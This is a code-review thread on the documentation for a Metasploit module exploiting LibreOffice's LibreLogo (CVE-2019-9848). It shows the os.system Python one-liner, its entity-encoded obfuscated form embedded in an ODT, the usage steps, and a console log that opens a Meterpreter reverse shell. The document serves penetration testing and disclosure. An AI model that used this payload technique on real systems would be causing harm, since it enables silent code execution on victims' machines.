Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) (#12147)
rapid7/metasploit-framework: documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md

> ## Description

Reviewer: ```suggestion
## Introduction
```

Reviewer 2: The documentation template does not indicate whether `Introduction` or `Description` is preferred. `Description` Is preferred for consistency.

```
root@kali-2018:~/Desktop/metasploit-framework# grep -rn "# Introduction" documentation/ | wc -l
22
root@kali-2018:~/Desktop/metasploit-framework# grep -rn "# Description" documentation/ | wc -l
255
```

  This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. 

  By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 

  This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.

>   The generated document file contains a one-liner python code that does an os.system : 

Reviewer: ```suggestion
  The generated document file contains a one-liner python code that calls `os.system`: 
```

  ```python

>   getattr(__import__(“os”),“system”)(“<%= @cmd %>”)

Reviewer 2: ```suggestion
  getattr(__import__("os"),"system")("<%= @cmd %>")
```

  ```

  but encoded :

  ```xml

>   <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>

Reviewer 2: ```suggestion
  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)"<%= @cmd %>")</text:p>
```

Author: This is not a typo error, the python interpreter accepts it

  ```

>   To avoid any python error, the h1 title written in the document is a python comment `#`.

Reviewer 2: ```suggestion
  To avoid any python error, the `h1` title written in the document is a python comment `#`.
```

## Vulnerable Application

>   "LibreOffice versions prior to 6.2.5", but, unfortunately, it seems to also work on 6.2.5.

Reviewer: LibreOffice <= 6.2.5

>   "LibreOffice versions prior to 6.2.5", but, unfortunately, it seems to also work on 6.2.5.

Reviewer 2: ```suggestion
  LibreOffice version 6.2.5 and prior.
```

Also, list the versions of LibreOffice with which the module was tested here. ie:

```
This module has been tested successfully with:

* LibreOffice 6.2.4 on Windows 7
* LibreOffice 6.2.4 on Debian 9.9
```

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/fileformat/libreoffice_logo_exec```
  4. Do: ```set LHOST <ip>```
  5. Do: ```set LPORT <port>```
  6. Do: ```run```
  7. Move the generated file to the target
  8. Start a handler
  9. Open the file with a vulnerable version of LibreOffice
 10. You should get a shell.

## Scenarios

> ### Tested on LibreOffice 6.2.4 running Windows 7

Reviewer 2: ```suggestion
### LibreOffice 6.2.4 on Windows 7
```

  ```
  msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

  [+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.33.1:4444 
  [*] Sending stage (179779 bytes) to 192.168.33.102
  [*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400

  meterpreter > 
  ```

> ### Tested on LibreOffice 6.2.4 running Debian 9.9

Reviewer 2: ```suggestion
### Tested on LibreOffice 6.2.4 on Debian 9.9
```

## Description

  This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. 

  By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 

  This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.

  The generated document file contains a one-liner python code that calls `os.system`: 

  ```python
  getattr(__import__("os"),"system")("<%= @cmd %>")
  ```

>   but with smart quotes `“os”`(because this interpreter accepts it and why not?) and encoded :

Reviewer 2: Smart quotes are the devil.

> because this interpreter accepts it

Disputable:

```
$ python
Python 2.7.15rc1 (default, Nov 12 2018, 14:31:15) 
[GCC 7.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> print(“a”)
  File "<stdin>", line 1
    print(“a”)
          ^
SyntaxError: invalid syntax
>>> 
```

```
$ python3
Python 3.6.7 (default, Oct 22 2018, 11:32:17) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print(“a”)
  File "<stdin>", line 1
    print(“a”)
            ^
SyntaxError: invalid character in identifier
>>> 
```

> and why not?

Potential environment locale issues.

Reviewer 2: I realised afterwards that you said `this interpreter`, rather than the Python interpreter. :shrug:

It looks like you've tested on a couple systems. Marking this as resolved.

Author: Yes I was speaking about the way it handles the odt text part and interprets it in Python
